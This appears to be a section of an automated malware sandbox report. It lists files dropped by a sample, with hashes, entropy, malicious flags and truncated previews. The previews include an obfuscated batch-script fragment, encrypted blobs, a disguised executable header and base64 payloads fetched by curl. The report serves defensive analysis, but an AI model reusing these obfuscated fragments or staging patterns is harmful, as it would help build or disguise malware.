                                      Preview:..W..7.<...<*"...4..R.!I...Q.I.....A.@..W.Tsp.j.....Z..N.T...n...C/..{.......a....(.mb.+...N..d0.3kX.~..&..kk.4....A?[..\.z.....WZ5...I.+.8..rW*].Z...OQ:.5..d..VY.cR.i.:..3.......{.#.'.k.|.e..1..|.vX.t.U.;.k...Z.7-..*I....C.b.[XM...&.!....$'..?...*~vN...R.E.u..w/...Oe...iFS$....\...7.B..........%...p......TP.l..p.9.6|.r[.Q.~..o.j.k.....y......C.....[.c=>.=L{..N,....Ke.6}i...3.tV...1Z..ur..e.A.G*..@S73y.......V!v`Ex.c2....3.).....42gu.....#....&}vC/b...&...........T...T5U...1`..~1:..|...(D..]7.....t,..8...2H....A.\...2.....)-#.....b...tt.B..Ri...T.Zd..KI.I...........`}..I......G.+./.`y..!.e.....rJ.........fU[....].B..S.\O>{...O.c@..;k.O.9.9K..83.O...)A0R..........@r.U.R..*.#l....<.v`.....<N.8......kJ\..D.Z......)va3..Z-..WEH.u.~v{)aQ0c...p....[.Tl.Oi<n......BpQ.f.{`@...Q.)...BO...9..4..<x?..V...y.aR9..O.Y0...Rl...CM......{{v........n........EL..4xH....q....C.K......&~..J....4..:....4IO....X.....;!..C....n..Z.b..8.S....N(T
                                      Process:C:\Users\user\AppData\Local\Temp\RevenueDevices.exe
                                      File Type:ASCII text, with very long lines (1312), with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):27864
                                      Entropy (8bit):5.097783792840429
                                      Encrypted:false
                                      SSDEEP:768:GyoGt7cUtqnmJJbg0LJr+H6yqd1iODluLc2hAXQS1e4:zZtkmJJk+Jr+md8OBuLzGQge4
                                      MD5:EA06D1BF2AC0ECE898D348D4D0559255
                                      SHA1:FC121D4832E0DCEBED63E6AF20D88B3D6406314C
                                      SHA-256:1EC9CC6B926282A80E3938D9A3DD0944CF79D1F3513B489B64FFDF1121E3595F
                                      SHA-512:9F65B3D381C992446E11749F498F3E37979B050A787D176F46B8158008F7CBDE83C185133EE2F6DEDA8DEC6A6C45548D6D91B419FFC4FA3DBF1A6D7D6233C3E4
                                      Malicious:false
                                      Preview:Set Niger=g..MoAEngineer-Hdtv-Register-Usda-Supported-Mount-Soma-Annotation-Guard-..lMAAlien-..UKWPostposted-Kuwait-Al-Jennifer-Specialists-Expressions-..bdPassive-Advertisers-Further-Unsubscribe-Drivers-Disco-..lNCompleted-..KRuxInjection-Med-..HeTft-Crazy-Shares-..hyCGifts-Rats-Shakira-Principle-Community-Gates-..PNbUntil-Tones-Illustrated-Varying-Senator-Considers-Floors-..uCUValuable-..Set Warcraft=h..nrcnAssociated-Tile-Almost-Edited-Edt-Victoria-Load-..bRUWma-Spreading-Worry-Calculate-..yxIParameter-Wondering-Syria-Toolbox-Acer-Tricks-Printable-..mDwGJuvenile-Usually-Packet-Kruger-Toronto-Shock-..jgRepublicans-Du-..Set Toe=u..aKaRTractor-Missed-Important-Declined-Eyes-..QjfmExplaining-Salary-Naked-..oKAttached-Genesis-Dude-Proceed-Johnston-Script-Libraries-..XUPlatinum-..WzTattoo-Credit-Funny-Sharp-Sally-..fhPPortal-Boot-Moore-Ourselves-..QHqInform-Creatures-Crash-..HLRaise-Tobacco-Colorado-..ldXPsp-Briefs-Seeking-..VJtwCanvas-Brake-Harper-Jake-Excluded-Dinner-Defence-All-Earl-..
                                      Process:C:\Windows\SysWOW64\cmd.exe
                                      File Type:ASCII text, with very long lines (1312), with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):27864
                                      Entropy (8bit):5.097783792840429
                                      Encrypted:false
                                      SSDEEP:768:GyoGt7cUtqnmJJbg0LJr+H6yqd1iODluLc2hAXQS1e4:zZtkmJJk+Jr+md8OBuLzGQge4
                                      MD5:EA06D1BF2AC0ECE898D348D4D0559255
                                      SHA1:FC121D4832E0DCEBED63E6AF20D88B3D6406314C
                                      SHA-256:1EC9CC6B926282A80E3938D9A3DD0944CF79D1F3513B489B64FFDF1121E3595F
                                      SHA-512:9F65B3D381C992446E11749F498F3E37979B050A787D176F46B8158008F7CBDE83C185133EE2F6DEDA8DEC6A6C45548D6D91B419FFC4FA3DBF1A6D7D6233C3E4
                                      Malicious:false
                                      Preview:Set Niger=g..MoAEngineer-Hdtv-Register-Usda-Supported-Mount-Soma-Annotation-Guard-..lMAAlien-..UKWPostposted-Kuwait-Al-Jennifer-Specialists-Expressions-..bdPassive-Advertisers-Further-Unsubscribe-Drivers-Disco-..lNCompleted-..KRuxInjection-Med-..HeTft-Crazy-Shares-..hyCGifts-Rats-Shakira-Principle-Community-Gates-..PNbUntil-Tones-Illustrated-Varying-Senator-Considers-Floors-..uCUValuable-..Set Warcraft=h..nrcnAssociated-Tile-Almost-Edited-Edt-Victoria-Load-..bRUWma-Spreading-Worry-Calculate-..yxIParameter-Wondering-Syria-Toolbox-Acer-Tricks-Printable-..mDwGJuvenile-Usually-Packet-Kruger-Toronto-Shock-..jgRepublicans-Du-..Set Toe=u..aKaRTractor-Missed-Important-Declined-Eyes-..QjfmExplaining-Salary-Naked-..oKAttached-Genesis-Dude-Proceed-Johnston-Script-Libraries-..XUPlatinum-..WzTattoo-Credit-Funny-Sharp-Sally-..fhPPortal-Boot-Moore-Ourselves-..QHqInform-Creatures-Crash-..HLRaise-Tobacco-Colorado-..ldXPsp-Briefs-Seeking-..VJtwCanvas-Brake-Harper-Jake-Excluded-Dinner-Defence-All-Earl-..
                                      Process:C:\Users\user\AppData\Local\Temp\RevenueDevices.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):55296
                                      Entropy (8bit):7.996425515192741
                                      Encrypted:true
                                      SSDEEP:1536:QjlyE+ynuF+X9HagYe9pCzlN0QHVIOpsgEFqNqRBa:QjlR+J+NS/zlq2Ies/FqNqm
                                      MD5:6F514C002DA512210E64BB40B389938E
                                      SHA1:2E18FF508F42EFA8B771DE5C6C4AB776B95F27E5
                                      SHA-256:F3612359DC4FCF6B5B1A1F7DE8D01260B029FA5663DECD830EA701F49D8F9254
                                      SHA-512:32B0420FB84921812B864367776FD8F8EBFA00799CB474673CDA445448F7D60BBB43C2464622256B8CE5B45D58620E15C524B379914254C6A366896E5A9FE96E
                                      Malicious:true
                                      Preview: .,&.b..k...l*i..{^j....y..........'.qa*.{K..*..$..Zd^...."...y...Q.Ni_.j.eq)..i-SC....u ...."."zbrxj...\=..._D.&....q.lr...@..m...f..\.. .V.#yg...../[....ny.0....:c.by.s...=L..7.R.. d40....q..k.........z..2..d./...R....M..J3m...!.c....H.D./._......z......#.....&.>...{E{...tVi:...C........&.F......>.'N.R....3.....Jm;>.m.....>....).vB..b?.Jir......<.q......?uY...]......0'...oO .....v.[.."..)G"..Or....n.%P....].......VrW5!..@....>NMH.......b.4.{;....|...=28....w@i$.W1....B...;]..f.....$8D...(..=.>?J.3..n..,&.>k}Z...L~/qLo...@s2b...*q..Ij..V>..6.%d...t....=..T%C..:>r....JB....!.=...\.R#P."w7...r...4<b\..A..:....hG.z....Y.6.4.o..y.........g{-....L4...'.%).q.d.T..AX..M.,..,.gR.$.*.T9r.,..M"80...]w...Z`Y*.6....\P...@..K.y......A......tvZT..E....{.&...(..3......._....S}.Z..l..y......\}i.3T>../..M..~>....@Z.y..W...d.K.._....1@..=E.T.5...Nm...B...zvU....fd....<...5]..*n.j...\...g..KK..(A..6..9P.H../X......&...f.|.;c.bi.....,..ly........D.........
                                      Process:C:\Users\user\AppData\Local\Temp\RevenueDevices.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):93184
                                      Entropy (8bit):7.998179873024088
                                      Encrypted:true
                                      SSDEEP:1536:IJ7fpWmVR947WJpKBjqGlfMyWw4XNetIVwnkjN5VfmzPKR:IJdWGiWJpg0SGEkRR
                                      MD5:3AE881AAE44C0D99645ECCD7C0476DE2
                                      SHA1:D888F63971C106EA70C94742259E4B012352C189
                                      SHA-256:53AD1ED80D9A1C61242F88DA71CE874E3F23DBA723A8BCD311A9C5611D9E6824
                                      SHA-512:46F11524A3BF7A9DF6E020C349C241CB23E33250CA05E8047D4D9555DBDFA9E008673961298E645B5B1A64635FEF9F8C2DD938B5E4496305013D1436CDF32659
                                      Malicious:true
                                      Preview:Y...P...aq...(..hJ..66!Ct9A.h....1U.U...%..J.....X..Z..~.....S...L...8.......A..|.......W./..A...2......K....~....k..".j... Vo......{..+z..dT.RmoF;i.T..@........T......`*W..J....p.R.."MJ*.|8./1.z.....&.6.....D/;....M\......(y........uUn8*$U)e........{..01$.?...t+....*M.(.kK.R..z.|...\J....<s.... .j..4...!.1..pF.*}=DC......bx.J....._.,.....E.........l.V...7.........r.`.z...d..qS...~Vu.=...Q/.(".B.[8o..'_.7q2T...x. {].....%y:.+2....-.z<.xpciP../...,...>(.YS.<.,..L....+R..Rb.ZQ..m.k....zp.ZE........B.x..P..D...LAjt.e_TS....6...Ad...=/~b.J.I.+. .,:.j......4I.6.[y.g.qM"...9h....JfW.m..u.N.$$.........NW.....g-ds...&=.*..z,..{N..=mU.Z.....&...... ......n.#.T~..JX.K..$.d.|.H..8".k.....X.%W..>.4.....6.E.r..A...).....h. ...6.q..>T.$.:...1......6(...sXJf.......0.]7#!+....d7...s.{...y.D..c0.......XX...V[.e...?.GE.._......r....3H.K...pW*.x..5[...]i#......)(i.keu...j...}.........*..|..H....(.....7w.&.U...R..9aT.kP.~./5.(.4..........W.~.b....o..."A.
                                      Process:C:\Users\user\AppData\Local\Temp\RevenueDevices.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):17183
                                      Entropy (8bit):7.988350562180771
                                      Encrypted:false
                                      SSDEEP:384:wA4VpjZ/UNGuIvgvnYQNJeCmEDnOwdDJKAQWX0emQYg5vh6p:wA4VpyNGHvgvnxeCvOWPQATYgOp
                                      MD5:C93AF8F0303E164AED3CC9322F159DAA
                                      SHA1:D187A11D000A1CF0FA59EFB54F4FFC231F7BEF06
                                      SHA-256:63D5678C4E49212E030896980B1AE1088198FDB582BEDBF4518F2B4B650A5F0B
                                      SHA-512:5F8388C1AAA4A06AE1CEAFC10E0E2C53FC62A41D2EACE3AFCB59F102440274395B7A6464CF739FCD8AE164145D3143F726C3D76B09A2A0EF3B30FAB7014885A8
                                      Malicious:false
                                      Preview:0....s.v..........DLq...p..........V.D.$......d.nW.G......a.....:T....I#.B....T..v...-.g..w....n..a.&..v..\....`.m...VI.K...`...-......K.%5:.,>HEAeL|3.!...\.Ht.~.,".?/W..\....B}.8..FH...;...tP..k...4'./..L#h..s.G.>....X' D.T.....}...w.e_.M.P.3....apf...w#...R.....R..U..M4..{D.!....J....O.....D....V....^...X0....8?04|..?y..a..2...G-H>....p.....W.p..".........8.v,...U....U...\T......[.Cn...j.z9VxR.d..iE5.8G]...m.d.QV.q..sGa.w.).K.8#7.!.."...S...C(..h.c..$........z...HI.Y/.Xk...8...t.=..q......{...H.(.H..l*wSq.$..}..9...G.{k.A4a....3.wE...9:/....^........Bab..>t1.Xa..f.y..B.e..r.a._.o.H.$..v.iuWy.....5...(.....K...%.FK....d..Q^.~.@.Y.u.{...y....H.o.M..<5,.s.L.Z...K.>j..,~..`Qu/"n.c..qm..rk..x.C.u.5|^..l..v.[.:..S.!7....<.} J.ZZd..:..Bc>r.y^..<.'c?r.Y....!.Z..e.C..6..5..N.8.a%.5`...........$.q|...O.#x(...9W\"..l)Au...=%...i.n.3.X.4br..c.X.kJ9.~.n..Ui~.s.e.v~;!9.4.|/&&...a,..?....G"zO.....+0.pI....a...K.1.c.[;.....5.S%]v.......f.a..0..6..
                                      Process:C:\Users\user\Desktop\file.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):71203
                                      Entropy (8bit):7.997295077101538
                                      Encrypted:true
                                      SSDEEP:1536:imGYQCuy5K7S0cDsS7+f/aGbWFff1MulVFqM:TGm15KG5N+YFFMulVFL
                                      MD5:A6FF954B2B3AB1B7CEB50D8A741634F4
                                      SHA1:E0187051AECF821376FD0510E5D77F3242BC8262
                                      SHA-256:92AC594838A86F8C997EB04BA0280CAEC17967B59BF2B0D04B14D28528DDABE3
                                      SHA-512:4E1C8BB9ED6882CEE55BF550FB447B06D6385FBAA29C0595B0056485D3FA5A61AABDE1A4AEC0C9059657490EBE746E6DF3AFBDA4187A510D043B51C7412957FA
                                      Malicious:true
                                      Preview:.D.*..9...@....l.......i....\(...P`....Gb..(Q.2.3...b.9.K..#.b.w....1..p.y1S3..+...1....B.V,.Cf.W?.BrI..KN.....Y.+....%6.......W\.k......8!|...h.cw..l.#.V...s...k..)...+..jI..`_..wK.......,N..o.%.y...M%"....c.M..g....9.SAj)X0.N......|.^.=.0.{E..#.a........U.A..mg7..c..=..{."..{..@c.`3.'..Q.....e....../ ..n..3.....n..u.0<..3SG....2.. .cjw...X..N"t.=.C...W..j.B5..<.1..se..}m...?.+.....}*S.e..}g....+.r...k"..+.'G*...T.otkG.....j..X.?.].....>..(.B.2...M.&'R.........>...o.=..=.I/.'....+.....Oa....L.&...:].*..*)...8K.E[.0...`..C.u.e"...5-.v(2.|t+p....=./n....#....%..gu.b)^..r..nF.\CFy..76.-m.+D.K...R..?....p>k...0oQ*..7.>.M.,4K...A.y..h.*#.|.Y..#..$t..152..`..-C}.......5*...??.:.F..vz.U.j...g;s?.Hl.z.Iub2Y./...2.V.I...\..../.r&.;A...&.`gZ.u..-...GCJ.6.co.OsY-.I.....$.....^.#.3.J........wE.Y.:....tP..S...$.[.)+.]A...c..F..F~..5...5r.....u.D;.... .Oy..i..|..`S..&...S,..G..;......d..B..,n]pi.G...u....g.R3...>z.7.]qA.1.?(.+...(.H..a=V..w."E...nt6|.l.....
                                      Process:C:\Users\user\Desktop\file.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):71680
                                      Entropy (8bit):7.9972561119733765
                                      Encrypted:true
                                      SSDEEP:1536:MzQ5q/rbdL2APKYtyvbXgIMYQMjImuenvJkLO6DN:0JfP/YzVV9hnvJkLHDN
                                      MD5:37147518E6EEFEC4502BB35B161D0B3C
                                      SHA1:A149A777507CAA0BF842248C84C6B13035CFEF05
                                      SHA-256:9CD4216B30EA98D340AE517BACE407D2AF2D1886BCB003FE58DE7B6717EBBD39
                                      SHA-512:F67523BBCA1B5110766AF1EE0F624679B8D5FFD6F55F93E765C31814600DF34F47477EE290D11640449AB919201041462A57A69B3047A973B48556D42C23D973
                                      Malicious:true
                                      Preview:.[./....@l..5c..Z..5liQ.k...Ei^:...v....+x.j..j=W[...$.X.......#...q.......d...5W..#.;eC.....s.Kf..e.@..X...D.=./..]....v.x.!G....g.Bpk.....<..TD'.X..+..Y..z......>..lDB...e.$........7....j.v...f.....hc.x..... .R.k...i._D.Vn.-J..5.D.j..D=..3P..<.#.u....+..FY.9..).......y.....=.z.I.........b.-.Z.k.t.w..N.e.i.q.&.+6..g>...?|.%q.q.....i#.._,.r.._.%.X...l~...%...p...U"..(.....w7^..s....n}....>&K...F.....r....g..M_....f6-(.4.8=..x..wE......[..k..Uu..<..5>$L..H+Y.4.....av!.m.Pl.m.}...w....]........EuU_.,..SA......Gd..@.c.H{..W...R.........=.....45.&_s.3.|k^..2C.......o....6.3..FJ.k...i..c....%......%...w{....p.............rT..M.#.'.M.R..PB0S..q."..?.d...9.S.DWE.{.`_..8w.:t..._..4N[..+Ib{."..aL..8C.0!v...Y.c.H$.=.....M....3./cA..Y.'..d.\.,...'y..x.A.YR...h}..mB...'.;.I..P.}.Kx2...........k.5....w9..wV..M....l...S..#..O....`d#V.[.~..+<...&N...V..C....H_.....|.l....q.ba..v..#.Y..L.......o.LGi.M.>'oTm.-.P.;...5..<^.m......6....)..7.v...%;
                                      Process:C:\Users\user\AppData\Local\Temp\RevenueDevices.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):19214
                                      Entropy (8bit):6.415320460009485
                                      Encrypted:false
                                      SSDEEP:384:AlFuOqohnWzR7NNilkEdpMMKAdbLPlUccucHU0f//+ddNEqCt7E3c:8FxfhnWz8kETRZbRUccWk+3+e3c
                                      MD5:26E155FC3EF2C17CD9E020224971D6B6
                                      SHA1:B39303949CB9DF0E79E7D379492EF985F9803BCD
                                      SHA-256:A587A7035E7BA1E0A687D365C7239724C2AF5616826EE7CBE6B42C03AC89448B
                                      SHA-512:E7E19FF87E894D3EB0DEB2A39C78E6C158350DD4E641A1BA7127EBC6120AED680EE86BFA06C448B6B640D3065AC5A5A4E7AE0EC7E7D97927C5256BA549230FD9
                                      Malicious:false
                                      Preview:OVERTOOLBARALOTNHL..MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........;...h...h...h4;mh...h4;oh...h4;nh...h..[h...h..i...h..i...h..i...h...h...h...h...h...h...h..i..h..i...h..ch...h...h...h..i...hRich...h........PE..L...!..^.........."...............................@.......................................@...@.......@........................|....P..h............J.......0..@v...........................C..........@............................................text...%........................... ..`.rdata..............................@..@.data...|p.......H..................@....rsrc...h....P......................@..@.reloc..@v...0...x..................@..B............................................................................................................................................................................................................................................................
                                      Process:C:\Windows\SysWOW64\curl.exe
                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                      Category:dropped
                                      Size (bytes):2047980
                                      Entropy (8bit):5.693378984841103
                                      Encrypted:false
                                      SSDEEP:24576:4SwAsCOCLyZNJEXP62JHUdnWcv9BK6/ZKF+l8Qz0xaEf+eJYA3pYElWzgdRe:4gs2yZryQ/ZaZkMYLZ
                                      MD5:9FAEAD3FD586F150C4D8BF862EAE33A6
                                      SHA1:D6FEE79B329461541D4BF7639DA5932A9AFB7B10
                                      SHA-256:51D99751DD2134BB485247EF29D3BB6C5B48ED08F61B2EB41F12E7E41638D8C1
                                      SHA-512:6B87F37253606B06CD9A244BB74318B95CE8719CAA5623EF10B8C26C01529C60B917A76FC56CCF70275F40290993DEC1D56284B39FE91910A9726A39DF790269
                                      Malicious:false
                                      Preview:VFZxU0lDTUFJQ0NNQUNDQy0tOkFDRG9DQ0FDQUFBQUFRQ0lDQUFBQ0NBQUNBQUFDQUlBQ0NBQUNBQ0NDQUNDQ0FBQUNJQ0FBSUNDSUFDQ0MyQ0NBQ0k8ZHdnNkF0QW5OSWBvQFRNMGpUR2hyY3lCdWNlOWxhbUZ2SUVMamJvN3RkQ0JrUlFCeWxVNm9hVTZlUEc7VEtPOXRYR1d1RFEwS0pDSUNBQUFDQ0FCQGU5RnBCWnEtTUFVY3Z4ZURHcDo2REdJOkdDWWF+eGVFWWt1NkRAcy9NSV1jdGprcEdyODRIbWtUT0FrY3R6Z2doeVU2QkpxLU1CNkpJaGVHR3A6NlVtbGhpQ1VhfnhlSUFDQ0NDQ0NBQ05KRENBQE1BUVlBMndCSlR3QUNDQUFDQUFBQzRJQUFDUXNAQ2VDQ2JlQ0NBRllKSUNCQ0lDQUxPQ0NDQ0BDQUNJS0NDQUNBQUVBQUFASUNBQUFBQ0FBREFBQUNCb0FDQ0FVQ0FDQ0NBQ0NDQVBBUklDQUVJQ0Z8Z0BLQ0NlQEFqWUlDR0FDQUVBQUFBQ0lTQUFBU0NBQUNBQUFDRUlBQ0NBQUNBQ0NDQUNDQ05Kc0NJTlFBSUNDSVFDOkNhckdBQ0lJQ0NBQ0FBQUFBakpFUEFHZ21DQUFDb0FjQ1pJa0NDQUFDQUNDQ0FDQ0NBQUFDSUNBQUlDQ0lBQ0NDQ0NDQUNJSUNDQUNBQUFBQUFDSUNBQUFDQ0FBQ0FBQUNBSUFDQ0FDQ0FDRlNBZUNDQUFBQ0lDQUFJQ0NJQUNDQ0NDQ0FDSUlDQ0FDQUFBQUFMbFpuZUhRQ0NBQ3diUUFDQUpBQ0NBQndBQ0NDQkNDQ0FBQUNJQ0FBSUNDSUFDQ0NLQ0NBW0s9e1hHRDBZUUFBWWtnQ0FBQ0NDQUFDTEFBQ0FASUNDQUFDQUNDQ0FDQ0NBQUFDSUdBQUlHQ31aRUQyW1NDQUNEcClAZ0NBc0FBQUFDQUNBQUNnQ0FBQ0FB
                                      Process:C:\Windows\SysWOW64\curl.exe
                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                      Category:dropped
                                      Size (bytes):298556
                                      Entropy (8bit):5.379476611183253
                                      Encrypted:false
                                      SSDEEP:3072:T7MVB4NzC5tmjDNpJol5YccxLSnh7VPHb6SYZ8g3H5mjhg/9/C//n0Q+v8o/q1u2:TLmOwmunJcZ8gpgq5O9YrihCTHE
                                      MD5:65E07A754EFFE6EC11638A25447289A5
                                      SHA1:948CBF6B970FFB432D8EBB1D367CEE5AFA826A83
                                      SHA-256:995338989BBEB5F5304A6C1FC13D75580A26BED964CC9F930E6D6DBC59FA5FD5
                                      SHA-512:67F896FE0B1A4385119351BD41A5D62FEF03F261A32E2B347DE2F2E1475A482BD366BC9CFFA26690EC8105DB0BC60267DF2397D6B7EC4A9CA7EE49819552CFB6
                                      Malicious:false
                                      Preview:VFZxU0lDTUFJQ0NNQUNDQy0tOkFDRG9DQ0FDQUFBQUFRQ0lDQUFBQ0NBQUNBQUFDQUlBQ0NBQUNBQ0NDQUNDQ0FBQUNJQ0FBSUNDSUFDQ0M2Q0NBQ0k8ZHdnNkF0QW5OSWBvQFRNMGpUR2hyY3lCdWNlOWxhbUZ2SUVMamJvN3RkQ0JrUlFCeWxVNm9hVTZlUEc7VEtPOXRYR1d1RFEwS0pDSUNBQUFDQ0FEQ1VzWkdoTE9tRDRReHFAZ0dNNGVaNWl5NU42TXp5QGdNTTRpWjRoTW9EJzB0ckJnVU02Z1hzal9oRjRVeHNCY0pMNllaa1xPbUQ3SVRvamFVTTRlWlVtbGhpS1F6eUBhSUFDQ0NDQ0NBQ0lJQ0NBQ0FBQUFBQUNJQ0FBQUNDQUJTUlFBQ1RJRUZDRkNRSTJLQ0FDQ0NBQUFDSU1BQUx1R0RBU1tDQ0xDQkNJTGVDUUNBQUFBQWVHb0BBQUFTQ0FBQzRBRUNBSUJDQ0FBU0FDQ0NFQ0NDQkFBQ0lDQUFJQ0NNQUNDQ0NDQ0FDSUxDQ3dDQUVBQUFnS2NGQUFNQ0NBQUNBQkFDQUpBQ0NBQUNFQ0NDRUNDQ0FBQUNJQEFBSUNDSUFDQ0NDQ0NBQ0xJMUNnQFFBQUFBQUNJQ0FBQUNDQUFDQUFBQ0FJQUNDQUFDQUNDQ0FDQ0NBQUFDSUNBQUlDQ0lBQ0NDQ0NDQUNJSUNDQUNBQUFBQUFDSUNBQUFDQ0FBQ0FBQUNBSUFDQ0FBQ0FDQ0NBQ0NDQUFBQ0lDQUFJQ0NJNENHQ3RDR0FDSUlDQ0FDQUFBQUFBQ0lDQUFBQ0NBQUNBQUFDQUlBQ0NDNTJaWmoyQUNDQ3dNTUBJQ0FRSUNDSTBDR0NDQENBQ0lJQ0NBQ0FBQUFBQUNJQ0FDQUNDR0F3Y21SamRPRUNDSUpqQUNDQzRDR0NBSEFDSUNEZ0lTQ0lBQ0NDQ0NDQUNJSUNDQUBBQUFCQUxvWmpkR0VDQ0FDR1ln
                                      Process:C:\Windows\SysWOW64\curl.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):4
                                      Entropy (8bit):2.0
                                      Encrypted:false
                                      SSDEEP:3:On:On
                                      MD5:C00C81FEDEF0B80B43CC1DB8DE50C00C
                                      SHA1:1AC21B1D5ACCB55CFA0ABBBCF57F836AADA49EE2
                                      SHA-256:A23C9F5563AD1C2019C59DDE6EB4FA3442C0B5BBF83A279854A3EE3987C51E7B
                                      SHA-512:869551F28FFE1BB9BA906EAA94D9C54FD2197215510DBF5A4F053F71A45C189A570F27920AC3688862E21043854319718B6E028D25A4E453FAAD9770EDE9C6D2
                                      Malicious:false
                                      Preview:bhlo
                                      Process:C:\Windows\SysWOW64\curl.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):11
                                      Entropy (8bit):3.0271691184406193
                                      Encrypted:false
                                      SSDEEP:3:fuMjn:2c
                                      MD5:25E067CD4E4A75F63362CC5BBB6753F7
                                      SHA1:B44F0BDC9FF51735FFC74806DF56F87C47F232D8
                                      SHA-256:79372B9479FE4256464762527DE1169F3C449582EC7625C2D7A1F6FB7D4B62F9
                                      SHA-512:F863DD82AA3DC83387866153D3862F96DAD0F8F3A60D0ACC9F076EC20BD659671802FAD9B2E6B3E11E82C548C88040CB58682CD8566EE149B228E89A5850B4EB
                                      Malicious:false
                                      Preview:8.46.123.75
                                      Process:C:\Windows\SysWOW64\curl.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):4
                                      Entropy (8bit):2.0
                                      Encrypted:false
                                      SSDEEP:3:On:On
                                      MD5:C00C81FEDEF0B80B43CC1DB8DE50C00C
                                      SHA1:1AC21B1D5ACCB55CFA0ABBBCF57F836AADA49EE2
                                      SHA-256:A23C9F5563AD1C2019C59DDE6EB4FA3442C0B5BBF83A279854A3EE3987C51E7B
                                      SHA-512:869551F28FFE1BB9BA906EAA94D9C54FD2197215510DBF5A4F053F71A45C189A570F27920AC3688862E21043854319718B6E028D25A4E453FAAD9770EDE9C6D2
                                      Malicious:false
                                      Preview:bhlo
                                      Process:C:\Windows\SysWOW64\curl.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:modified
                                      Size (bytes):4
                                      Entropy (8bit):2.0
                                      Encrypted:false
                                      SSDEEP:3:On:On
                                      MD5:C00C81FEDEF0B80B43CC1DB8DE50C00C
                                      SHA1:1AC21B1D5ACCB55CFA0ABBBCF57F836AADA49EE2
                                      SHA-256:A23C9F5563AD1C2019C59DDE6EB4FA3442C0B5BBF83A279854A3EE3987C51E7B
                                      SHA-512:869551F28FFE1BB9BA906EAA94D9C54FD2197215510DBF5A4F053F71A45C189A570F27920AC3688862E21043854319718B6E028D25A4E453FAAD9770EDE9C6D2
                                      Malicious:false
                                      Preview:bhlo
                                      Process:C:\Windows\SysWOW64\curl.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):30
                                      Entropy (8bit):3.698068512058839
                                      Encrypted:false
                                      SSDEEP:3:Bwc5kVcWXXp1n:OceuWXXb
                                      MD5:6B3C07F4B0CCB74597582473E78AC2CC
                                      SHA1:B7FEAB641361EF360A1A6A871EBC2B4F8D1DB37F
                                      SHA-256:C3DD04036BC0F4701E4539BCB9C59C25A4439A74E0D6B70980B494FEE59D7687
                                      SHA-512:3176A698F4992981725F62A2062F64E33C0AACC0FABC78D038F44A0026312179838FB7E3B2708B31E5990660CC29C9010F990A16B473B9D69B444F04DC5A0CCE
                                      Malicious:false
                                      Preview:4CA966315CCC70F4BEF0FE322EDE46
                                      Process:C:\Windows\SysWOW64\curl.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):4
                                      Entropy (8bit):2.0
                                      Encrypted:false
                                      SSDEEP:3:On:On
                                      MD5:C00C81FEDEF0B80B43CC1DB8DE50C00C
                                      SHA1:1AC21B1D5ACCB55CFA0ABBBCF57F836AADA49EE2
                                      SHA-256:A23C9F5563AD1C2019C59DDE6EB4FA3442C0B5BBF83A279854A3EE3987C51E7B
                                      SHA-512:869551F28FFE1BB9BA906EAA94D9C54FD2197215510DBF5A4F053F71A45C189A570F27920AC3688862E21043854319718B6E028D25A4E453FAAD9770EDE9C6D2
                                      Malicious:false
                                      Preview:bhlo
                                      Process:C:\Windows\SysWOW64\curl.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):104
                                      Entropy (8bit):5.145748944015591
                                      Encrypted:false
                                      SSDEEP:3:9zHW4mVQFjDVB++U8qYZxGgUqeJ:RHW4miRPrqYZcLqeJ
                                      MD5:BEAABAAF1170504DE9CB53DE6EA6C43D
                                      SHA1:738AF18491BDC5F5F8EB581ABF32BE11F7B4BEA0
                                      SHA-256:B3F0913BFB1C486CD263BF9540D89DA3345387EEDD5EC82AC939592E212FAD90
                                      SHA-512:4731E8A631796596E6DA6A30B5FD7F0C5DD26C9E906C33A5F9B58C82EB4E53167D5E748D5AE263EC8317C659735C8C06DF09540AB71952D0947FDFF4FF6CFD0C
                                      Malicious:false
                                      Preview:UmV2Z2Z3ZURtdGtrZXEsZ3pnKFJnfm1sd2VGZXZpY2VzLG16ZSo2KDMqKmA0ODdgNWo1MzYzNmA0MDc1NmY0MmExZmc9OmY4Ozs7IjA=
                                      Process:C:\Windows\SysWOW64\curl.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):4
                                      Entropy (8bit):2.0
                                      Encrypted:false
                                      SSDEEP:3:On:On
                                      MD5:C00C81FEDEF0B80B43CC1DB8DE50C00C
                                      SHA1:1AC21B1D5ACCB55CFA0ABBBCF57F836AADA49EE2
                                      SHA-256:A23C9F5563AD1C2019C59DDE6EB4FA3442C0B5BBF83A279854A3EE3987C51E7B
                                      SHA-512:869551F28FFE1BB9BA906EAA94D9C54FD2197215510DBF5A4F053F71A45C189A570F27920AC3688862E21043854319718B6E028D25A4E453FAAD9770EDE9C6D2
                                      Malicious:false
                                      Preview:bhlo
                                      Process:C:\Windows\SysWOW64\curl.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):76
                                      Entropy (8bit):4.733997907838829
                                      Encrypted:false
                                      SSDEEP:3:GZNuxTXGyiXbNNvGUX5djB+n1fzKB:GZN4TXGzqAd9WfzKB
                                      MD5:7EC936AF6BBF93CFD08DE32EB291263D
                                      SHA1:6216FC54E2B9EBDB416331AA344540846840F410
                                      SHA-256:BFAB8D48CEC02A93FEC9BF66AA8CEFE0D02EC305FD335BBBACBE61F996990B26
                                      SHA-512:F44C298E6AAD646614C14260052D7327E0B1DB33F1212DF33F401179DC2EAD348312D9006C635EE71346FFB3BA692DD829941A9AC894C43EE3BE4C805DD8AD9E
